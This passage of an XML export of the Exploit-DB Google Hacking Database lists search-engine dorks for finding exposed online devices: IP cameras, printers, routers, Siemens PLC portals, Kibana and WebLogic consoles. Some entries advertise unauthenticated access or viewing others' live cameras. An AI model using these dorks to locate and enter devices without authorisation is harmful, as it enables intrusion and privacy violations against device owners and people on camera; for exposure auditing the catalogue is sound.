<shortDescription>inurl:/login/?referer=/admin/ intext:cradlepoint</shortDescription>
<textualDescription># Dork: inurl:/login/?referer=/admin/ intext:cradlepoint
# (Cradlepoint Router) Various Online Devices
# Exploit Author: Shivani Arya
</textualDescription>
<query>inurl:/login/?referer=/admin/ intext:cradlepoint</query>
<querystring>https://www.google.com/search?q=inurl:/login/?referer=/admin/ intext:cradlepoint</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Shivani Arya</author>
</entry>
<entry>
<id>5924</id>
<link>https://www.exploit-db.com/ghdb/5924</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/main.html intext:SHARP AND intext:MX-*</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>inurl:/main.html intext:SHARP AND intext:MX-*</query>
<querystring>https://www.google.com/search?q=inurl:/main.html intext:SHARP AND intext:MX-*</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6818</id>
<link>https://www.exploit-db.com/ghdb/6818</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/main/main.html &quot;Administrator Settings&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/main/main.html &quot;Administrator Settings&quot;
# Various online devices (admin pages of Brother printers).
# Date: 02/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/main/main.html &quot;Administrator Settings&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/main/main.html &quot;Administrator Settings&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4368</id>
<link>https://www.exploit-db.com/ghdb/4368</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/mjpg/video.mjpg</shortDescription>
<textualDescription>axis cameras.
By Barak Tawily.</textualDescription>
<query>inurl:/mjpg/video.mjpg</query>
<querystring>https://www.google.com/search?q=inurl:/mjpg/video.mjpg</querystring>
<edb></edb>
<date>2016-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4342</id>
<link>https://www.exploit-db.com/ghdb/4342</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/mjpgmain.asp</shortDescription>
<textualDescription>Name = Live view of Y-cam
Google dork Description:
inurl:/mjpgmain.asp
Date: 2016-10-19
Author: Devendra Singh Solanki</textualDescription>
<query>inurl:/mjpgmain.asp</query>
<querystring>https://www.google.com/search?q=inurl:/mjpgmain.asp</querystring>
<edb></edb>
<date>2016-10-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7066</id>
<link>https://www.exploit-db.com/ghdb/7066</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/multi.html intitle:webcam</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: inurl:/multi.html intitle:webcam
# Date: 2021-06-28
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>inurl:/multi.html intitle:webcam</query>
<querystring>https://www.google.com/search?q=inurl:/multi.html intitle:webcam</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>4142</id>
<link>https://www.exploit-db.com/ghdb/4142</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/net/net/protocol.html</shortDescription>
<textualDescription>Title: inurl:/net/net/protocol.html
Description: This dork can access many printers without login
By Sivabalan</textualDescription>
<query>inurl:/net/net/protocol.html</query>
<querystring>https://www.google.com/search?q=inurl:/net/net/protocol.html</querystring>
<edb></edb>
<date>2015-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>7138</id>
<link>https://www.exploit-db.com/ghdb/7138</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/nphMotionJpeg?Resolution=</shortDescription>
<textualDescription># Google Dork: inurl:/nphMotionJpeg?Resolution=
# Pages Various Online Devices
# Date: 24/08/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>inurl:/nphMotionJpeg?Resolution=</query>
<querystring>https://www.google.com/search?q=inurl:/nphMotionJpeg?Resolution=</querystring>
<edb></edb>
<date>2021-08-31</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5182</id>
<link>https://www.exploit-db.com/ghdb/5182</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/pages/default.aspx | inurl:/páginas/default.aspx</shortDescription>
<textualDescription># Google Dork: inurl:/pages/default.aspx | inurl:/páginas/default.aspx
# Description: Google Dork to find default sharepoint applications
# Date: 2019-09-12
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>inurl:/pages/default.aspx | inurl:/páginas/default.aspx</query>
<querystring>https://www.google.com/search?q=inurl:/pages/default.aspx | inurl:/páginas/default.aspx</querystring>
<edb></edb>
<date>2019-04-12</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>5149</id>
<link>https://www.exploit-db.com/ghdb/5149</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/portal/apis/fileExplorer/</shortDescription>
<textualDescription>inurl:/portal/apis/fileExplorer/
</textualDescription>
<query>inurl:/portal/apis/fileExplorer/</query>
<querystring>https://www.google.com/search?q=inurl:/portal/apis/fileExplorer/</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Thalysson Sarmento</author>
</entry>
<entry>
<id>6953</id>
<link>https://www.exploit-db.com/ghdb/6953</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/portal/indicate intitle:Remote UI</shortDescription>
<textualDescription># Exploit Title: Discover Publicly Available Devices
# Google Dork: inurl:/portal/indicate intitle:Remote UI
# Date: 2021-05-14
# Exploit Author: Saptarshi Chatterjee
</textualDescription>
<query>inurl:/portal/indicate intitle:Remote UI</query>
<querystring>https://www.google.com/search?q=inurl:/portal/indicate intitle:Remote UI</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>Saptarshi Chatterjee</author>
</entry>
<entry>
<id>4316</id>
<link>https://www.exploit-db.com/ghdb/4316</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/Portal/Portal.mwsl</shortDescription>
<textualDescription>This is a dork for the Siemens S7 series of PLC controllers. (SCADA)
Ps. Some are unrestricted
*Supernova*</textualDescription>
<query>inurl:/Portal/Portal.mwsl</query>
<querystring>https://www.google.com/search?q=inurl:/Portal/Portal.mwsl</querystring>
<edb></edb>
<date>2016-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4995</id>
<link>https://www.exploit-db.com/ghdb/4995</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/Portal/Portal.mwsl?PriNav=FileBrowser</shortDescription>
<textualDescription>inurl:/Portal/Portal.mwsl?PriNav=FileBrowser
Access into simatic step 7 plc software systems
by dekingofcyber....
</textualDescription>
<query>inurl:/Portal/Portal.mwsl?PriNav=FileBrowser</query>
<querystring>https://www.google.com/search?q=inurl:/Portal/Portal.mwsl?PriNav=FileBrowser</querystring>
<edb></edb>
<date>2018-10-23</date>
<author>dekingofcyber</author>
</entry>
<entry>
<id>6937</id>
<link>https://www.exploit-db.com/ghdb/6937</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/PRESENTATION/BONJOUR intitle:Series</shortDescription>
<textualDescription> # Exploit Title: Discover Publicly Available Epson Devices (printer, scanner etc.)
# Google Dork: inurl:/PRESENTATION/BONJOUR intitle:Series
# Date: 2021-05-14
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>inurl:/PRESENTATION/BONJOUR intitle:Series</query>
<querystring>https://www.google.com/search?q=inurl:/PRESENTATION/BONJOUR intitle:Series</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>6922</id>
<link>https://www.exploit-db.com/ghdb/6922</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/PRESENTATION/EPSONCONNECT</shortDescription>
<textualDescription># Dork: Discover Publicly Available Epson Devices (printer,scanner etc.)
# Google Dork: inurl:/PRESENTATION/EPSONCONNECT
# Date: 2021-05-07
# Exploit Author: Anmol K Sachan</textualDescription>
<query>inurl:/PRESENTATION/EPSONCONNECT</query>
<querystring>https://www.google.com/search?q=inurl:/PRESENTATION/EPSONCONNECT</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>6499</id>
<link>https://www.exploit-db.com/ghdb/6499</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/presentation/html/top/index.html</shortDescription>
<textualDescription># Google Dork: inurl:/presentation/html/top/index.html
# Description: discover publicly available Epson devices (printer, scanner etc.)
# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)
</textualDescription>
<query>inurl:/presentation/html/top/index.html</query>
<querystring>https://www.google.com/search?q=inurl:/presentation/html/top/index.html</querystring>
<edb></edb>
<date>2020-08-28</date>
<author>Juan Christian</author>
</entry>
<entry>
<id>6921</id>
<link>https://www.exploit-db.com/ghdb/6921</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML</shortDescription>
<textualDescription> # Exploit Title: Discover Publicly Available Epson Devices (printer,scanner etc.)
# Google Dork: inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML
# Date: 2021-05-06
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML</query>
<querystring>https://www.google.com/search?q=inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML</querystring>
<edb></edb>
<date>2021-05-06</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>6935</id>
<link>https://www.exploit-db.com/ghdb/6935</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/PRESENTATION/PSWD</shortDescription>
<textualDescription> # Exploit Title: Discover Publicly Available Epson Devices (printer, scanner etc.)
# Google Dork: inurl:/PRESENTATION/PSWD
# Date: 2021-05-14
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>inurl:/PRESENTATION/PSWD</query>
<querystring>https://www.google.com/search?q=inurl:/PRESENTATION/PSWD</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>5017</id>
<link>https://www.exploit-db.com/ghdb/5017</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/sample/LvAppl/lvappl.htm</shortDescription>
<textualDescription>[*] Dork: inurl:/sample/LvAppl/lvappl.htm
Dork to find Network Camera Server
Drok3r</textualDescription>
<query>inurl:/sample/LvAppl/lvappl.htm</query>
<querystring>https://www.google.com/search?q=inurl:/sample/LvAppl/lvappl.htm</querystring>
<edb></edb>
<date>2018-11-08</date>
<author>Drok3r</author>
</entry>
<entry>
<id>5078</id>
<link>https://www.exploit-db.com/ghdb/5078</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/setup.cgi@next_file=</shortDescription>
<textualDescription>Unauthorized Cisco LinkSys wireless
ManhNho
</textualDescription>
<query>inurl:/setup.cgi@next_file=</query>
<querystring>https://www.google.com/search?q=inurl:/setup.cgi@next_file=</querystring>
<edb></edb>
<date>2019-01-17</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4061</id>
<link>https://www.exploit-db.com/ghdb/4061</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/set_config_password.html</shortDescription>
<textualDescription>Submitter: Gman The Mod-dog</textualDescription>
<query>inurl:/set_config_password.html</query>
<querystring>https://www.google.com/search?q=inurl:/set_config_password.html</querystring>
<edb></edb>
<date>2015-08-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5172</id>
<link>https://www.exploit-db.com/ghdb/5172</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/signin.php?ret=</shortDescription>
<textualDescription>This dork will return websites which are running ShoreTel Connect
conferencing portals.
Ramikan
</textualDescription>
<query>inurl:/signin.php?ret=</query>
<querystring>https://www.google.com/search?q=inurl:/signin.php?ret=</querystring>
<edb></edb>
<date>2019-04-08</date>
<author>Ramikan</author>
</entry>
<entry>
<id>5130</id>
<link>https://www.exploit-db.com/ghdb/5130</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/snap.cgi?&amp;-getpic</shortDescription>
<textualDescription>Exposes a number of Master IP CAM 01 IP camera's
Midori'SH
https://twitter.com/MidoriShell
</textualDescription>
<query>inurl:/snap.cgi?&amp;-getpic</query>
<querystring>https://www.google.com/search?q=inurl:/snap.cgi?&amp;-getpic</querystring>
<edb></edb>
<date>2019-02-19</date>
<author>Midori-SH</author>
</entry>
<entry>
<id>5745</id>
<link>https://www.exploit-db.com/ghdb/5745</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/swagger/index.html</shortDescription>
<textualDescription># Exploit Title: Publicly Exposed Swagger API Documentation
# Google Dork: inurl:/swagger/index.html
# Date: 02/19/2020
# Exploit Author: MuckT
</textualDescription>
<query>inurl:/swagger/index.html</query>
<querystring>https://www.google.com/search?q=inurl:/swagger/index.html</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>MuckT</author>
</entry>
<entry>
<id>6344</id>
<link>https://www.exploit-db.com/ghdb/6344</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/sws/index.html</shortDescription>
<textualDescription>Dorks: inurl:/sws/index.html
Category: Sensitive Information
Summary: A Google dork that gives information about Samsung Printer.
</textualDescription>
<query>inurl:/sws/index.html</query>
<querystring>https://www.google.com/search?q=inurl:/sws/index.html</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>4166</id>
<link>https://www.exploit-db.com/ghdb/4166</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/tcpipv4.htm</shortDescription>
<textualDescription>TCP/IP Settings HP LaserJet Logins
-Xploit </textualDescription>
<query>inurl:/tcpipv4.htm</query>
<querystring>https://www.google.com/search?q=inurl:/tcpipv4.htm</querystring>
<edb></edb>
<date>2015-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4157</id>
<link>https://www.exploit-db.com/ghdb/4157</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/tcpipv6.htm</shortDescription>
<textualDescription>inurl:/tcpipv6.htm
Description: This google dork can access many HP LASER JET printers without login..
By Sivabalan ( CYBER GENIUS )..</textualDescription>
<query>inurl:/tcpipv6.htm</query>
<querystring>https://www.google.com/search?q=inurl:/tcpipv6.htm</querystring>
<edb></edb>
<date>2015-12-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7083</id>
<link>https://www.exploit-db.com/ghdb/7083</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/view.htm?mode=l</shortDescription>
<textualDescription># Google Dork: inurl:/view.htm?mode=l
# Various online devices
# Date: 17/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:/view.htm?mode=l</query>
<querystring>https://www.google.com/search?q=inurl:/view.htm?mode=l</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>4256</id>
<link>https://www.exploit-db.com/ghdb/4256</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/view/viewer_index.shtml</shortDescription>
<textualDescription>inurl:/view/viewer_index.shtml
Using this google dork can access various camera LIVE AXIS MODEL around the world ..
THis google dork is created by CYBER GENIUS ( SIVABALAN ).</textualDescription>
<query>inurl:/view/viewer_index.shtml</query>
<querystring>https://www.google.com/search?q=inurl:/view/viewer_index.shtml</querystring>
<edb></edb>
<date>2016-04-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6843</id>
<link>https://www.exploit-db.com/ghdb/6843</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/view/viewer_index.shtml</shortDescription>
<textualDescription># Title: IP Cameras
# Google Dork: inurl:/view/viewer_index.shtml
# Date: 19/03/2021
# Author: Tobias Marcotto
# Description: Find IP Cameras
</textualDescription>
<query>inurl:/view/viewer_index.shtml</query>
<querystring>https://www.google.com/search?q=inurl:/view/viewer_index.shtml</querystring>
<edb></edb>
<date>2021-03-22</date>
<author>Tobias Marcotto</author>
</entry>
<entry>
<id>6423</id>
<link>https://www.exploit-db.com/ghdb/6423</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/ViewerFrame? intitle:&quot;Network Camera NetworkCamera&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/ViewerFrame? intitle:”Network Camera NetworkCamera”
# Various online devices.
# Date: 20/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/ViewerFrame? intitle:&quot;Network Camera NetworkCamera&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/ViewerFrame? intitle:&quot;Network Camera NetworkCamera&quot;</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3846</id>
<link>https://www.exploit-db.com/ghdb/3846</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/voice/advanced/ intitle:Linksys SPA configuration</shortDescription>
<textualDescription>This allows you to look at linksys VOIP Router Config pages. </textualDescription>
<query>inurl:/voice/advanced/ intitle:Linksys SPA configuration</query>
<querystring>https://www.google.com/search?q=inurl:/voice/advanced/ intitle:Linksys SPA configuration</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>5215</id>
<link>https://www.exploit-db.com/ghdb/5215</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true</shortDescription>
<textualDescription># Google Dork: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true
# Description: Google Dork to find JBoss Management Console Server Information or tomcat status
# Date: 2019-05-15
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/</textualDescription>
<query>inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true</query>
<querystring>https://www.google.com/search?q=inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true</querystring>
<edb></edb>
<date>2019-05-15</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>5271</id>
<link>https://www.exploit-db.com/ghdb/5271</link>
<category>Various Online Devices</category>
<shortDescription>inurl:/_cat/indices/</shortDescription>
<textualDescription>Dork connected to latest Orvibo database leak.
Regards
baxter21
</textualDescription>
<query>inurl:/_cat/indices/</query>
<querystring>https://www.google.com/search?q=inurl:/_cat/indices/</querystring>
<edb></edb>
<date>2019-07-03</date>
<author>baxter21</author>
</entry>
<entry>
<id>3812</id>
<link>https://www.exploit-db.com/ghdb/3812</link>
<category>Various Online Devices</category>
<shortDescription>inurl:32400/web/index.html</shortDescription>
<textualDescription>Submitting this for the GHDB. These are web accessible Plex Media Servers
where you can watch/listen to other people's media collections.
FYI</textualDescription>
<query>inurl:32400/web/index.html</query>
<querystring>https://www.google.com/search?q=inurl:32400/web/index.html</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7934</id>
<link>https://www.exploit-db.com/ghdb/7934</link>
<category>Various Online Devices</category>
<shortDescription>inurl:7001/console intitle:weblogic</shortDescription>
<textualDescription># Google Dork: inurl:7001/console intitle:weblogic
# Various Online Devices
# Date: 31/05/2022
# Exploit Author: Al Imran</textualDescription>
<query>inurl:7001/console intitle:weblogic</query>
<querystring>https://www.google.com/search?q=inurl:7001/console intitle:weblogic</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Al Imran</author>
</entry>
<entry>
<id>5850</id>
<link>https://www.exploit-db.com/ghdb/5850</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8000 intext:&quot;Copyright CANON INC. 2012&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>inurl:8000 intext:&quot;Copyright CANON INC. 2012&quot;</query>
<querystring>https://www.google.com/search?q=inurl:8000 intext:&quot;Copyright CANON INC. 2012&quot;</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>5148</id>
<link>https://www.exploit-db.com/ghdb/5148</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8000/portal/</shortDescription>
<textualDescription>inurl:8000/portal/
</textualDescription>
<query>inurl:8000/portal/</query>
<querystring>https://www.google.com/search?q=inurl:8000/portal/</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Thalysson Sarmento</author>
</entry>
<entry>
<id>5939</id>
<link>https://www.exploit-db.com/ghdb/5939</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8080/dashboard intitle:Graphite Dashboard</shortDescription>
<textualDescription># Google Dork: inurl:8080/dashboard intitle:Graphite Dashboard
# Various Graphite Dashboards.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:8080/dashboard intitle:Graphite Dashboard</query>
<querystring>https://www.google.com/search?q=inurl:8080/dashboard intitle:Graphite Dashboard</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5940</id>
<link>https://www.exploit-db.com/ghdb/5940</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8080/dashboard.php</shortDescription>
<textualDescription># Google Dork: inurl:8080/dashboard.php
# Zabbix Dashboards.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:8080/dashboard.php</query>
<querystring>https://www.google.com/search?q=inurl:8080/dashboard.php</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6514</id>
<link>https://www.exploit-db.com/ghdb/6514</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8080/view/viewer_index.shtml?id= -site:*.com</shortDescription>
<textualDescription># Dork: inurl:8080/view/viewer_index.shtml?id= -site:*.com
# Author: Mehmet Ali Kerimoglu
</textualDescription>
<query>inurl:8080/view/viewer_index.shtml?id= -site:*.com</query>
<querystring>https://www.google.com/search?q=inurl:8080/view/viewer_index.shtml?id= -site:*.com</querystring>
<edb></edb>
<date>2020-09-02</date>
<author>cyb3rmx0</author>
</entry>
<entry>
<id>6457</id>
<link>https://www.exploit-db.com/ghdb/6457</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8081/ &quot;Pan, Tilt &amp; Zoom&quot;</shortDescription>
<textualDescription># Google Dork: inurl:8081/ &quot;Pan, Tilt &amp; Zoom&quot;
# Various online devices (webcams).
# Date: 29/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:8081/ &quot;Pan, Tilt &amp; Zoom&quot;</query>
<querystring>https://www.google.com/search?q=inurl:8081/ &quot;Pan, Tilt &amp; Zoom&quot;</querystring>
<edb></edb>
<date>2020-07-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5272</id>
<link>https://www.exploit-db.com/ghdb/5272</link>
<category>Various Online Devices</category>
<shortDescription>inurl:8443 AND -intitle:8443 AND -intext:8443 prohibited|restricted|unauthorized</shortDescription>
<textualDescription>Interesting content/portals hosted on non-standard ports.
inurl:8443 AND -intitle:8443 AND -intext:8443
prohibited|restricted|unauthorized
Alternatively this can be replaced with
inurl:8080 AND -intitle:8080 AND -intext:8080
prohibited|restricted|unauthorized
D
</textualDescription>
<query>inurl:8443 AND -intitle:8443 AND -intext:8443 prohibited|restricted|unauthorized</query>
<querystring>https://www.google.com/search?q=inurl:8443 AND -intitle:8443 AND -intext:8443 prohibited|restricted|unauthorized</querystring>
<edb></edb>
<date>2019-07-03</date>
<author>Dec0y</author>
</entry>
<entry>
<id>4692</id>
<link>https://www.exploit-db.com/ghdb/4692</link>
<category>Various Online Devices</category>
<shortDescription>inurl::5601/app/kibana</shortDescription>
<textualDescription>Check this out multiple ELK/Kibana management portal are open with no
creds on the default port 5601
Using this dork inurl::5601/app/kibana
More results could be found on shodan as well.
BR
Ziad Khalil
@z0day
</textualDescription>
<query>inurl::5601/app/kibana</query>
<querystring>https://www.google.com/search?q=inurl::5601/app/kibana</querystring>
<edb></edb>
<date>2018-03-07</date>
<author>Ziad Khalil</author>
</entry>
<entry>
<id>5281</id>
<link>https://www.exploit-db.com/ghdb/5281</link>
<category>Various Online Devices</category>
<shortDescription>inurl:app/kibana intext:Loading Kibana</shortDescription>
<textualDescription># Exploit Title: Kibana Login no credentials
# Google Dork: inurl:app/kibana intext:Loading Kibana
#Author: Francis Al Victoriano
</textualDescription>
<query>inurl:app/kibana intext:Loading Kibana</query>
<querystring>https://www.google.com/search?q=inurl:app/kibana intext:Loading Kibana</querystring>
<edb></edb>
<date>2019-07-15</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>4185</id>
<link>https://www.exploit-db.com/ghdb/4185</link>
<category>Various Online Devices</category>
<shortDescription>inurl:autodiscover/autodiscover ext:xml</shortDescription>
<textualDescription>Locate Outlook Web Apps that have auto-discover feature enabled
-Oni49</textualDescription>
<query>inurl:autodiscover/autodiscover ext:xml</query>
<querystring>https://www.google.com/search?q=inurl:autodiscover/autodiscover ext:xml</querystring>
<edb></edb>
<date>2016-01-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>681</id>
<link>https://www.exploit-db.com/ghdb/681</link>
<category>Various Online Devices</category>
<shortDescription>inurl:axis-cgi</shortDescription>
<textualDescription>Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)</textualDescription>
<query>inurl:axis-cgi</query>
<querystring>https://www.google.com/search?q=inurl%3Aaxis-cgi</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>6432</id>
<link>https://www.exploit-db.com/ghdb/6432</link>
<category>Various Online Devices</category>
<shortDescription>inurl:axis-cgi/jpg</shortDescription>
<textualDescription>Description: inurl:axis-cgi/jpg
This google dorks give us various screenshot of secured webcam.
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>inurl:axis-cgi/jpg</query>
<querystring>https://www.google.com/search?q=inurl:axis-cgi/jpg</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6446</id>
<link>https://www.exploit-db.com/ghdb/6446</link>
<category>Various Online Devices</category>
<shortDescription>inurl:axis-cgi/mjpg/video swf</shortDescription>
<textualDescription>inurl:axis-cgi/mjpg/video swf
This google dorks give us various videos &amp; clips of secured webcam.
linkedin profile: https://www.linkedin.com/in/sachin-k-92b521151/
Thanks,
Sachin
</textualDescription>
<query>inurl:axis-cgi/mjpg/video swf</query>
<querystring>https://www.google.com/search?q=inurl:axis-cgi/mjpg/video swf</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>5846</id>
<link>https://www.exploit-db.com/ghdb/5846</link>
<category>Various Online Devices</category>
<shortDescription>inurl:axis-cgi/mjpg/video.cgi</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>inurl:axis-cgi/mjpg/video.cgi</query>
<querystring>https://www.google.com/search?q=inurl:axis-cgi/mjpg/video.cgi</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4088</id>
<link>https://www.exploit-db.com/ghdb/4088</link>
<category>Various Online Devices</category>
<shortDescription>inurl:axis.cgi ext:cgi</shortDescription>
<textualDescription>Dork for all axis cams. Enjoy with them!.
These Dork is Discovered by Rootkit Pentester.</textualDescription>
<query>inurl:axis.cgi ext:cgi</query>
<querystring>https://www.google.com/search?q=inurl:axis.cgi ext:cgi</querystring>
<edb></edb>
<date>2015-10-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4069</id>
<link>https://www.exploit-db.com/ghdb/4069</link>
<category>Various Online Devices</category>
<shortDescription>inurl:browse.php inurl:kcfinder -github.com</shortDescription>
<textualDescription>Panels of files for kcfinder Software. Have fun!.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:browse.php inurl:kcfinder -github.com</query>
<querystring>https://www.google.com/search?q=inurl:browse.php inurl:kcfinder -github.com</querystring>
<edb></edb>
<date>2015-09-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>876</id>
<link>https://www.exploit-db.com/ghdb/876</link>
<category>Various Online Devices</category>
<shortDescription>inurl:camctrl.cgi</shortDescription>
<textualDescription>Vivotec web cams</textualDescription>
<query>inurl:camctrl.cgi</query>
<querystring>https://www.google.com/search?q=inurl%3Acamctrl.cgi</querystring>
<edb></edb>
<date>2005-03-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4383</id>
<link>https://www.exploit-db.com/ghdb/4383</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cgi-bin &quot;ARRIS Enterprises&quot;</shortDescription>
<textualDescription>Dork for Panels ARRIS Router.
Enjoy healthy.
Dork made by Rootkit Pentester.</textualDescription>
<query>inurl:cgi-bin &quot;ARRIS Enterprises&quot;</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin &quot;ARRIS Enterprises&quot;</querystring>
<edb></edb>
<date>2017-01-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3772</id>
<link>https://www.exploit-db.com/ghdb/3772</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cgi-bin/cosmobdf.cgi?</shortDescription>
<textualDescription>COSMOView for building management. Author: GhOsT-PR</textualDescription>
<query>inurl:cgi-bin/cosmobdf.cgi?</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin/cosmobdf.cgi?</querystring>
<edb></edb>
<date>2011-12-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1376</id>
<link>https://www.exploit-db.com/ghdb/1376</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cgi-bin/guestimage.html</shortDescription>
<textualDescription>just more more MOBOTIX's</textualDescription>
<query>inurl:cgi-bin/guestimage.html</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin/guestimage.html&amp;start=0&amp;sa=N&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4407</id>
